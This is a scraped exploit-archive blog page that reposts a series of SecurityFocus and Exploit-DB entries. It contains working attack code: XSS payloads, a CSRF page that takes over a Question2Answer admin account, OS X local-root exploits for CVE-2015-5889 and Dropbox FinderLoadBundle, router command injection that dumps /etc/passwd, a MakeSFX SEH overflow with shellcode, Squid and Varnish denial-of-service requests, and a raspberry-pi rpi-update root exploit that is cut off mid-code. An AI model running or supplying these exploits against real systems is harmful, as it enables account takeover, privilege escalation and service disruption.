source: https://www.securityfocus.com/bid/58415/info
The Terillion Reviews plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863153221
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/58414/info
Question2Answer is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Question2Answer 1.5.4 is vulnerable; other versions may also be affected.
<html>
<head>
<title>Exploit for stealing admin's account in Question2Answer. Made by
MustLive. http://www.example.com</title>
</head>
<body onLoad="StartCSRF()">
<script>
function StartCSRF() {
for (var i=1;i<=2;i++) {
var ifr = document.createElement("iframe");
ifr.setAttribute('name', 'csrf'+i);
ifr.setAttribute('width', '0');
ifr.setAttribute('height', '0');
document.body.appendChild(ifr);
}
CSRF1();
setTimeout(CSRF2,1000);
}
function CSRF1() {
window.frames["csrf1"].document.body.innerHTML = '<form name="hack"
action="http://www.example.com/account"; method="post">n<input type="hidden"
name="handle" value="test">n<input type="hidden" name="email"
value="email () attacker com">n<input type="hidden" name="messages"
value="1">n<input type="hidden" name="mailings" value="1">n<input
type="hidden" name="field_1" value="test">n<input type="hidden"
name="field_2" value="test">n<input type="hidden" name="field_3"
value="test">n<input type="hidden" name="dosaveprofile"
value="1">n</form>';
window.frames["csrf1"].document.hack.submit();
}
function CSRF2() {
window.frames["csrf2"].document.body.innerHTML = '<form name="hack"
action="http://www.example.com/attack.php"; method="post">n<input type="hidden"
name="do" value="1">n</form>';
window.frames["csrf2"].document.hack.submit();
}
</script>
</body>
</html>
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
# tested on osx 10.9.5 / 10.10.5
# jul/2015
# by rebel
import os,time,sys
env = {}
s = os.stat("/etc/sudoers").st_size
env['MallocLogFile'] = '/etc/crontab'
env['MallocStackLogging'] = 'yes'
env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
sys.stderr.write("creating /etc/crontab..")
p = os.fork()
if p == 0:
os.close(1)
os.close(2)
os.execve("/usr/bin/rsh",["rsh","localhost"],env)
time.sleep(1)
if "NOPASSWD" not in open("/etc/crontab").read():
sys.stderr.write("failed\n")
sys.exit(-1)
sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")
while os.stat("/etc/sudoers").st_size == s:
sys.stderr.write(".")
time.sleep(1)
sys.stderr.write("\ndone\n")
os.system("sudo su")
# Exploit Title: [Vehicle 3G Wi-Fi Router - PIXORD - Multiple
Vulnerabilities]
# Date: May 01, 2015 [No response from Vendor till date]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [http://www.pixord.com/en/products_show.php?show=17]
# Version: [Model Name :3GR-431P]
[Software Version :RTA-A001_02]
[Wireless Driver Version :2.6.0.0]
*Vehicle 3G Wi-Fi Router - PIXORD *
http://www.pixord.com/en/products_show.php?show=17
*Device Info *
Model Name :3GR-431P
Software Version :RTA-A001_02
Wireless Driver Version :2.6.0.0
PiXORD 3GR-431P 3G Wi-Fi Router is a 3G + GPS + 802.11n (2T2R) wireless
router. It supports Internet access via 3G and receives position
information from GPS. 3GR-431P also supports two Ethernet ports for LAN
connectivity and 802.11n Wi-Fi Access Point for WLAN connectivity.
It is available to install the 3GR-431P on the transportation. The
passengers can use the laptop or smart phone via Wi-Fi to browse the
Internet on the go. The Ethernet port also can connect IP camera to provide
the real time monitoring.
Vulnerability Impact: Easy and full device compromise. Access to configured
keys, passwords, pass-phrases, accounts, etc. Ability to monitor the user /
vehicle via camera / connected devices.
*Multiple Security Vulnerabilities *
*1. OS command injection *
$ telnet 192.168.1.10
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.
Vehicle 3G Wi-Fi Router
Login: admin
Password:
>
> ?
mobile3G
mobileGPS
model
reboot
restoredefault
version
As seen above, only few specific, functional options are available for
device management.
However, we can bypass this and dump hashes easily.
> ?;cat /etc/passwd
sh: ?: not found
admin:<password1>:0:0:Adminstrator:/:/bin/sh
support:<password2>:0:0:Adminstrator:/:/bin/sh
user:<password3>:0:0:Adminstrator:/:/bin/sh
> exit
Note that this is also applicable when a non-admin ‘user’ / ‘support’ logs
in over the Telnet.
The web application lacks strict input validation and hence vulnerable to
OS command injection attack.
*2. Configuration not secured properly / AuthZ issues *
The device has three users - admin, support, user.
Apparently, there is no separation of privileges between these 3 users,
when accessing over HTTP(S). All options are available to all three then.
This allows 'user' /'support' to access device configuration file -
RT2880_Settings.dat. Configuration backup contains b64-encoded login
passwords + clear-text WPA keys + other sensitive information.
.. …
*Sensitive information in configuration file - *
*more RT2880_Settings.dat *
#The following line must not be removed.
Default
WebInit=1
HostName=pixord
Login=admin
Password=<admin_password_here>=
Login2=support
Password2=<support_password_here>==
Login3=user
Password3=<user_password_here>==
OperationMode=1
Platform=RT3352
.....
<snip>
.....
wan_pppoe_user=pppoe_user
wan_pppoe_pass=pppoe_passwd
wan_l2tp_server=l2tp_server
wan_l2tp_user=l2tp_user
wan_l2tp_pass=l2tp_passwd
.....
<snip>
.....
wan_pptp_server=pptp_server
wan_pptp_user=pptp_user
wan_pptp_pass=pptp_passwd
.....
<snip>
.....
DDNS=
DDNSAccount=<ddns_account_name_here>
DDNSPassword=<ddns_password_here>
CountryRegion=
CountryRegionABand=
CountryCode=
BssidNum=1
SSID1=PiXORD
WirelessMode=9
.....
<snip>
.....
WscSSID=RalinkInitialAP
WscKeyMGMT=WPA-EAP
WscConfigMethod=138
WscAuthType=1
WscEncrypType=1
WscNewKey=<wsc_key_here>
IEEE8021X=0
IEEE80211H=0
CSPeriod=6
PreAuth=0
AuthMode=WPAPSKWPA2PSK
EncrypType=TKIPAES
RekeyInterval=3600
RekeyMethod=TIME
PMKCachePeriod=10
WPAPSK1=<WPA_PSK_Key_here>
DefaultKeyID=2
Key1Type=0
Key1Str1=
Key2Type=0
Key2Str1=
Key3Type=0
Key3Str1=
Key4Type=0
Key4Str1=
WapiPskType=0
.....
<snip>
.....
WdsEnable=0
WdsEncrypType=NONE
WdsList=
WdsKey=
WirelessEvent=0
RADIUS_Server=0
RADIUS_Port=1812
RADIUS_Key=
RADIUS_Acct_Server=
RADIUS_Acct_Port=1813
RADIUS_Acct_Key=
.....
<snip>
.....
wan_3g_apn=public
wan_3g_dial=*99#
wan_3g_user=
wan_3g_pass=
<snip>
RADIUS_Key1=<radius_key_here>
.....
<snip>
.....
Also, as observed in point 1 above, all the users have a UID 0, i.e. root
level privileges to the device:
admin:<password1>:0:0:Adminstrator:/:/bin/sh
support:<password2>:0:0:Adminstrator:/:/bin/sh
user:<password3>:0:0:Adminstrator:/:/bin/sh
The application should ideally provide specific privileges to different
users, and enforce strict access control.
*3. Application does not secure configured passwords (HTTPS) *
Masked password(s) can be retrieved via frame source (inspect element) and
/ or intercepting request via a proxy.
The application should mask/censure (*****) the passwords, keys and any
other crucial pieces of configuration and must not pass the values in
clear-text.
*4. Program / Scripts running in an insecure manner - leaking clear-text
passwords in process information *
After logging in to the device over Telnet, we can drop in to a shell via
OS command injection attack described in point 1.
> ?;sh
sh: ?: not found
Enter 'help' for a list of built-in commands.
BusyBox v1.12.1 (2012-12-25 11:48:22 CST) built-in shell (ash)
#
Checking running processes reveal a system program *inadyn*, which
apparently is a service for ddns connectivity, leaking valid username and
password in clear-text.
# ps aux
PID USER VSZ STAT COMMAND
1 admin 1768 S init
2 admin 0 RWN [ksoftirqd/0]
.....
<snip>
.....
2159 admin 1096 S inadyn -u *<ddns-username_here>* -p *<ddns-password_here>*
-a *<ddns_domain_here>*
4050 admin 1768 R ps aux
The programs should be run securely without passing cli arguments and
parameter values in clear-text.
--
Best Regards,
Karn Ganeshen
source: https://www.securityfocus.com/bid/58401/info
McAfee Vulnerability Manager is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
McAfee Vulnerability Manager 7.5.0 and 7.5.1 are vulnerable; other versions may also be affected.
GET /www.example.com/index.exp HTTP/1.1
Cookie: identity=p805oa53c0dab5vpcv1da30me7;
cert_cn=%27%22%28%29%26%251%3CScRiPt %3Eprompt%28920847%29%3C%2FScRiPt%3E;
remember=remember
Host: 172.28.1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
# Exploit Title: Bosch Security Systems - XML Injection - Dinion NBN-498 Web Interface
# Date: 01/09/2015
# Exploit Author: neom22
# Vendor Homepage: http://us.boschsecurity.com
# Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf
# Version: Hardware Firmware 4.54.0026 - Web Interface version is unknown
# Tested on: Windows 8.1 - Firefox 40.0.3
# CVE : CVE-2015-6970 (To be published)
#################################################
# #
# Discovered by neom22 #
# 23 - 09 - 2015 #
# #
#################################################
#
#
Bosch Security Systems - Dinion NBN-498 - Web Interface (Live Feed and Administration)
#
#
Vulnerability Discovery: 10/09/2015
Vendor Contact: 17/09/2015 (no answer)
Published: 24/09/2015
#
#
Description:
-----------------------------------------------------------------
The Dinion2x IP Day/Night camera is a high-performance, smart
surveillance color camera. It incorporates 20-bit digital signal
processing and a wide dynamic range sensor for outstanding
picture performance under all lighting conditons.
The camera uses H.264 compression technology to give clear
images while reducing bandwidth and storage requirements. It
is also ONVIF compliant to improve compatibility during system
integration.
The camera operates as a network video server and transmits
video and control signals over data networks, such as Ethernet
LANs and the Internet.
-----------------------------------------------------------------
Useful Links:
Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf
Documentation: http://resource.boschsecurity.us/documents/Installation_Manual_enUS_2032074379.pdf
Product:
http://us.boschsecurity.com/en/us_product/products/video/ipcameras/sdfixedcameras/nbn498dinion2xdaynightipc/nbn498
dinion2xdaynightipc_608
-----------------------------------------------------------------
XML Parameter Injection POC
_-Request-_
GET /rcp.xml?idstring=<string>injection</string> HTTP/1.1
Host: postoipiranga.dyndns-ip.com:10004
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: HcsoB=60cd4a687de94857
Connection: keep-alive
_-Response-_
HTTP/1.1 200 OK
Server: VCS-VideoJet-Webserver
Connection: keep-alive
Content-Type: text/xml
Accept-Ranges: bytes
Content-Length: 359
Expires: 0
Cache-Control: no-cache
Set-Cookie: HcsoB=60cd4a687de94857; path=/;
<rcp>
<command>
<hex>0x0000</hex>
<dec> 0</dec>
</command>
<type>T_DWORD</type>
<direction>READ</direction>
<num>0</num>
<idstring><string>injection</string></idstring>
<payload></payload>
<cltid>0x478e</cltid><sessionid>0x00000000</sessionid><auth>1</auth><protocol>TCP</protocol> <result>
<err>0x40</err>
</result>
</rcp>
source: https://www.securityfocus.com/bid/58399/info
Your Own Classifieds is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/cat-search/for-sales-2/%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E
source: https://www.securityfocus.com/bid/58334/info
Verax NMS is prone to multiple security-bypass and information disclosure vulnerabilities.
Attackers can exploit these issues to bypass certain security restrictions, perform unauthorized actions, and obtain sensitive information; this may aid in launching further attacks.
Versions prior to Verax NMS 2.1.0 are vulnerable.
#!/usr/bin/python
#just based on http://www.example.com/tutorials/general/client.html#basic-example
from pyamf import AMF0, AMF3
from pyamf.remoting.client import RemotingService
client = RemotingService('http://installationurl/enetworkmanagementsystem-fds/messagebroker/amf',
amf_version=AMF3)
service = client.getService('userService')
print service.getAllUsers()
source: https://www.securityfocus.com/bid/58319/info
Squid is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.
Squid 3.2.5 is vulnerable; other versions may also be affected.
Request
-- cut --
#!/usr/bin/env python
print 'GET /index.html HTTP/1.1'
print 'Host: localhost'
print 'X-HEADSHOT: ' + '%XX' * 19000
print '\r\n\r\n'
-- cut --
Response
-- cut --
HTTP/1.1 200 OK
Vary: X-HEADSHOT
-- cut --
source: https://www.securityfocus.com/bid/58314/info
Varnish Cache is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application, effectively denying service to legitimate users.
Varnish Cache 2.1.5 is vulnerable; other versions may also be affected.
The following example data is available:
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 99999999999999999
HTTP/1.1 200 OK
Content-Length: 2147483647
source: https://www.securityfocus.com/bid/58313/info
File Manager is prone to an HTML-injection vulnerability and a local file-include vulnerability.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, steal cookie-based authentication credentials and open or run arbitrary files in the context of the web server process. Other attacks are also possible.
File Manager 1.2 is vulnerable; other versions may also be affected.
Local file-include:
<div id="bodyspace"><div id="main_menu"><h1>File Manager</h1></div><div id="main_left">
<img src="http://www.example.com/images/wifilogo2.png" alt="" title="" border="0"><ul class="menu"><li class="item-101 current active">
<a href="http://www.example.com/" target="_blank">Hilfe</a></li><li class="item-110">
<a href="http://www.example.com/index.php/feedback-support" target="_blank">Kontakt / Feedback</a></li></ul></div>
<div id="module_main"><bq>Files</bq><p><a href="..">..</a><br>
<a href="1234.png.txt.iso.php.asp">1234.png.txt.iso.php.asp</a> ( 95.8 Kb, 2013-02-11 07:41:12 +0000)<br>
<a href="[../../>[UNAUTHORIZED LOCAL FILE/PATH INCLUDE VULNERABILITY]]">[../../>[UNAUTHORIZED LOCAL FILE/PATH INCLUDE VULNERABILITY]]</a>
( 27.3 Kb, 2013-02-11 07:45:01 +0000)<br />
<a href="About/">About/</a> ( 0.1 Kb, 2012-10-10 18:20:14 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file
<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" />
</label></form></div></center></body></html></iframe></a></p></div></div>
HTML-injection :
<div id="bodyspace"><div id="main_menu"><h1>File Manager</h1></div><div id="main_left">
<img src="http://www.example.com/images/wifilogo2.png" alt="" title="" border="0"><ul class="menu"><li class="item-101 current active">
<a href="http://www.example.com/" target="_blank">Hilfe</a></li><li class="item-110">
<a href="http://www.example.com/index.php/feedback-support" target="_blank">Kontakt / Feedback</a></li></ul></div>
<div id="module_main"><bq>Files</bq><p><a href="..">..</a><br>
<a href="[PERSISTENT INJECTED SCRIPT CODE!].png.txt.iso.php.asp">[PERSISTENT INJECTED SCRIPT CODE!].png.txt.iso.php.asp</a>
( 95.8 Kb, 2013-02-11 07:41:12 +0000)<br>
<a href="[PERSISTENT INJECTED SCRIPT CODE!]">[PERSISTENT INJECTED SCRIPT CODE!]</a>
( 27.3 Kb, 2013-02-11 07:45:01 +0000)<br />
<a href="About/">About/</a> ( 0.1 Kb, 2012-10-10 18:20:14 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file
<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" />
</label></form></div></center></body></html></iframe></a></p></div></div>
'''
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-MAKESFX-BUFF-OVERFLOW-09302015.txt
Vendor:
================================
freeextractor.sourceforge.net/FreeExtractor
freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe
Vulnerable Product:
==================================================
MakeSFX.exe v1.44
Mar 19 2001 & Dec 10 2009 versions
Vulnerability Type:
============================
Stack Based Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=========================
Converts a zip file into a 32-bit GUI Windows self-extractor.
Example usage:
makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"]
[/website="http://www.example.com"] [/intro="This is a test self extractor"]
[/defaultpath="$desktop$\My Files"] [/autoextract] [/openexplorerwindow]
[/shortcut="$desktop$\Program Shortcut.lnk|$targetdir$\Program.exe]
[/delete] [/icon="MyIcon.ico"] [/overwrite] [/?]
etc...
The '/title' argument when supplied an overly long payload will overwrite NSEH & SEH exception handlers
causing buffer overflow, we can then execute our aribitrary shellcode. I have seen some applications using
MakeSFX.exe from .bat files for some automation purposes, if the local .bat file is replaced by malicious
one attackers can cause mayhem on the system.
Both versions from 2001 & 2009 are vulnerable but exploit setup will be off by 80 bytes.
punksnotdead="/title"+"A"*1078+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Dec 10 2009)
punksnotdead="/title"+"A"*1158+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Mar 19 2001)
POC exploit code(s):
====================
We will exploit MakeSFX v1.44 (Mar 19 2001).
I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, Rebase all set to False, but it contains null 0x00.
So no suitable SEH instruction address avail, I will instead have to use mona.py to look for POP,POP,RET instruction
in outside modules and we find some...
e.g.
0x77319529 : pop esi # pop edi # ret | {PAGE_READONLY}
Python script to exploitz!
==========================
'''
import struct,os,subprocess
#MakeSFX v1.44 (Mar 19 2001)
pgm="C:\\hyp3rlinx\\MakeSFX.exe "
#shellcode to pop calc.exe
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
#punksnotdead="A"*1158+"RRRR"+"BBBB" #<--- KABOOOOOOM!
nseh="\xEB\x06"+"\x90"*2
seh=struct.pack('<L', 0x76F29529)
punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10
subprocess.Popen([pgm, punksnotdead], shell=False)
'''
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 30, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Tested successfully on Windows SP1
DisableExceptionChainValidation in registry set to '1'
value of 1 disables the registry entry that prevents SEH overwrites.
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
'''
#!/bin/bash
# Exploit Title: Dropbox FinderLoadBundle OS X local root exploit
# Google Dork: N/A
# Date: 29/09/15
# Exploit Author: cenobyte
# Vendor Homepage: https://www.dropbox.com
# Software Link: N/A
# Version: Dropbox 1.5.6, 1.6-7.*, 2.1-11.*, 3.0.*, 3.1.*, 3.3.*
# Tested on: OS X Yosemite (10.10.5)
# CVE: N/A
#
# Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# The setuid root FinderLoadBundle that was included in older DropboxHelperTools
# versions for OS X allows loading of dynamically linked shared libraries
# that are residing in the same directory. The directory in which
# FinderLoadBundle is located is owned by root and that prevents placing
# arbitrary files there. But creating a hard link from FinderLoadBundle to
# somewhere in a directory in /tmp circumvents that protection thus making it
# possible to load a shared library containing a payload which creates a root
# shell.
#
# - vulnerable versions: | versions not vulnerable:
# Dropbox 3.3.* for Mac | Dropbox 3.10.* for Mac
# Dropbox 3.1.* for Mac | Dropbox 3.9.* for Mac
# Dropbox 3.0.* for Mac | Dropbox 3.8.* for Mac
# Dropbox 2.11.* for Mac | Dropbox 3.7.* for Mac
# Dropbox 2.10.* for Mac | Dropbox 3.6.* for Mac
# Dropbox 2.9.* for Mac | Dropbox 3.5.* for Mac
# Dropbox 2.8.* for Mac | Dropbox 3.4.* for Mac
# Dropbox 2.7.* for Mac | Dropbox 3.2.* for Mac
# Dropbox 2.6.* for Mac | Dropbox 1.5.1-5 for Mac
# Dropbox 2.5.* for Mac | Dropbox 1.4.* for Mac
# Dropbox 2.4.* for Mac | Dropbox 1.3.* for Mac
# Dropbox 2.3.* for Mac |
# Dropbox 2.2.* for Mac |
# Dropbox 2.1.* for Mac |
# Dropbox 1.7.* for Mac |
# Dropbox 1.6.* for Mac |
# Dropbox 1.5.6 for Mac |
#
# The vulnerability was fixed in newer DropboxHelperTools versions as of 3.4.*.
# However, there is no mention of this issue at the Dropbox release notes:
# https://www.dropbox.com/release_notes
#
# It seems that one of the fixes implemented in FinderLoadBundle is a
# check whether the path of the bundle is a root owned directory making it
# impossible to load arbitrary shared libraries as a non-privileged user.
#
# I am not sure how to find the exact version of the FinderLoadBundle executable
# but the included Info.plist contained the following key:
# <key>CFBundleShortVersionString</key>
# This key is no longer present in the plist file of the latest version. So I
# included a basic vulnerable version checker that checks for the presence of
# this key.
#
# - exploit details:
# I wrote this on OS X Yosemite (10.10.5) but there are no OS specific features
# used. This exploit relies on Xcode for the shared library + root shell to be
# compiled. After successful exploitation a root shell is left in a directory in
# /tmp so make sure you delete it on your own system when you are done testing.
#
# - example:
# $ ./dropboxfinderloadbundle.sh
# Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
#
# [-] creating temporary directory: /tmp/c7a15893fc1b28d31071c16c6663cbf3
# [-] linking /Library/DropboxHelperTools/Dropbox_u501/FinderLoadBundle
# [-] constructing bundle
# [-] creating /tmp/c7a15893fc1b28d31071c16c6663cbf3/boomsh.c
# [-] compiling root shell
# [-] executing FinderLoadBundle using root shell payload
# [-] entering root shell
# bash-3.2# id -P
# root:********:0:0::0:0:System Administrator:/var/root:/bin/sh
readonly __progname=$(basename $0)
errx() {
echo "$__progname: $@" >&2
exit 1
}
main() {
local -r tmp=$(head -10 /dev/urandom | md5)
local -r helpertools="/Library/DropboxHelperTools"
local -r bundle="/tmp/$tmp/mach_inject_bundle_stub.bundle/Contents/MacOS"
local -r bundletarget="$bundle/mach_inject_bundle_stub"
local -r bundlesrc="${bundletarget}.c"
local -r sh="/tmp/$tmp/boomsh"
local -r shsrc="${sh}.c"
local -r cfversion="CFBundleShortVersionString"
local -r findbin="FinderLoadBundle"
echo "Dropbox $findbin OS X local root exploit by cenobyte 2015"
echo
uname -v | grep -q ^Darwin || \
errx "this Dropbox exploit only works on OS X"
[ ! -d "$helpertools" ] && \
errx "$helpertools does not exist"
which -s gcc || \
errx "gcc not found"
found=0
for finder in $(ls $helpertools/Dropbox_u*/$findbin); do
stat -s "$finder" | grep -q "st_mode=0104"
if [ $? -eq 0 ]; then
found=1
break
fi
done
[ $found -ne 1 ] && \
errx "couldn't find a setuid root $findbin"
local -r finderdir=$(dirname $finder)
local -r plist="${finderdir}/DropboxBundle.bundle/Contents/Info.plist"
[ -f "$plist" ] || \
errx "FinderLoadBundle not vulnerable (cannot open $plist)"
grep -q "<key>$cfversion</key>" "$plist" || \
errx "FinderLoadBundle not vulnerable (plist missing $cfversion)"
echo "[-] creating temporary directory: /tmp/$tmp"
mkdir /tmp/$tmp || \
errx "couldn't create /tmp/$tmp"
echo "[-] linking $finder"
ln "$finder" "/tmp/$tmp/$findbin" || \
errx "ln $finder /tmp/$tmp/$findbin failed"
echo "[-] constructing bundle"
mkdir -p "$bundle" || \
errx "cannot create $bundle"
echo "#include <sys/stat.h>" > "$bundlesrc"
echo "#include <sys/types.h>" >> "$bundlesrc"
echo "#include <stdlib.h>" >> "$bundlesrc"
echo "#include <unistd.h>" >> "$bundlesrc"
echo "extern void init(void) __attribute__ ((constructor));" >> "$bundlesrc"
echo "void init(void)" >> "$bundlesrc"
echo "{" >> "$bundlesrc"
echo " setuid(0);" >> "$bundlesrc"
echo " setgid(0);" >> "$bundlesrc"
echo " chown(\"$sh\", 0, 0);" >> "$bundlesrc"
echo " chmod(\"$sh\", S_ISUID|S_IRWXU|S_IXGRP|S_IXOTH);" >> "$bundlesrc"
echo "}" >> "$bundlesrc"
echo "[-] creating $shsrc"
echo "#include <unistd.h>" > "$shsrc"
echo "#include <stdio.h>" >> "$shsrc"
echo "#include <stdlib.h>" >> "$shsrc"
echo "int" >> "$shsrc"
echo "main()" >> "$shsrc"
echo "{" >> "$shsrc"
echo " setuid(0);" >> "$shsrc"
echo " setgid(0);" >> "$shsrc"
echo " system(\"/bin/bash\");" >> "$shsrc"
echo " return(0);" >> "$shsrc"
echo "}" >> "$shsrc"
echo "[-] compiling root shell"
gcc "$shsrc" -o "$sh" || \
errx "gcc failed for $shsrc"
gcc -dynamiclib -o "$bundletarget" "$bundlesrc" || \
errx "gcc failed for $bundlesrc"
echo "[-] executing $findbin using root shell payload"
cd "/tmp/$tmp"
./$findbin mach_inject_bundle_stub.bundle 2>/dev/null 1>/dev/null
[ $? -ne 4 ] && \
errx "exploit failed, $findbin seems not vulnerable"
[ ! -f "$sh" ] && \
errx "$sh was not created, exploit failed"
stat -s "$sh" | grep -q "st_mode=0104" || \
errx "$sh was not set to setuid root, exploit failed"
echo "[-] entering root shell"
"$sh"
}
main "$@"
exit 0
source: https://www.securityfocus.com/bid/58307/info
The Count Per Day plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An authenticated attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Count Per Day 3.2.5 and prior versions are vulnerable.
http://www.example.com/wordpress/wp-admin/?page=cpd_metaboxes HTTP/1.1... /daytoshow=2013-03-04%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&showday=Show
source: https://www.securityfocus.com/bid/58293/info
HP Intelligent Management Center is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
HP Intelligent Management Center 5.1 E0202 is vulnerable; other versions may also be affected.
http://www.example.com/imc/topo/topoContent.jsf?opentopo_symbolid="><img src="http://security.inshell.net/img/logo.png" onload=alert('XSS');>&opentopo_loader=null&opentopo_level1nodeid=3 &topoorientation_parentsymbolid=null&topoorientation_devsymbolid=null&topoorientation_level1nodeid=null &topoorientation_loader=null&checknode=null&ywkeys=isvlan&ywvalues=1&uselefttree=null&usetabpane=null&HandleMode=null&toponamelist=null
// source: https://www.securityfocus.com/bid/58292/info
rpi-update is prone to an insecure temporary file-handling vulnerability and a security-bypass vulnerability
An attacker can exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application, bypass certain security restrictions, and perform unauthorized actions. This may aid in further attacks.
/*Local root exploit for rpi-update on raspberry Pi.
Vulnerability discovered by Technion, technion@lolware.net
https://github.com/Hexxeh/rpi-update/
larry@pih0le:~$ ./rpix updateScript.sh
[*] Launching attack against "updateScript.sh"
[+] Creating evil script (/tmp/evil)
[+] Creating target file (/usr/bin/touch /tmp/updateScript.sh)
[+] Initialize inotify on /tmp/updateScript.sh
[+] Waiting for root to change perms on "updateScript.sh"
[+] Opening root shell (/tmp/sh)
# <-- Yay!
Larry W. Cashdollar
http://vapid.dhs.org
@_larry0
Greets to Vladz.
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <sys/inotify.h>
#include <fcntl.h>
#include <sys/syscall.h>
/*Create a small c program to pop us a root shell*/
int create_nasty_shell(char *file) {
char *s = "#!/bin/bash\n"
"echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
"cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
"chmod 4755 /tmp/sh;\n";
int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
write(fd, s, strlen(s));
close(fd);
return 0;
}
int main(int argc, char **argv) {
int fd, wd;
char buf[1], *targetpath, *cmd,
*evilsh = "/tmp/evil", *trash = "/tmp/trash";
if (argc < 2) {
printf("Usage: %s <target file> \n", argv[0]);
return 1;
}
printf("[*] Launching attack against \"%s\"\n", argv[1]);
printf("[+] Creating evil script (/tmp/evil)\n");
create_nasty_shell(evilsh);
targetpath = malloc(sizeof(argv[1]) + 32);
cmd = malloc(sizeof(char) * 32);
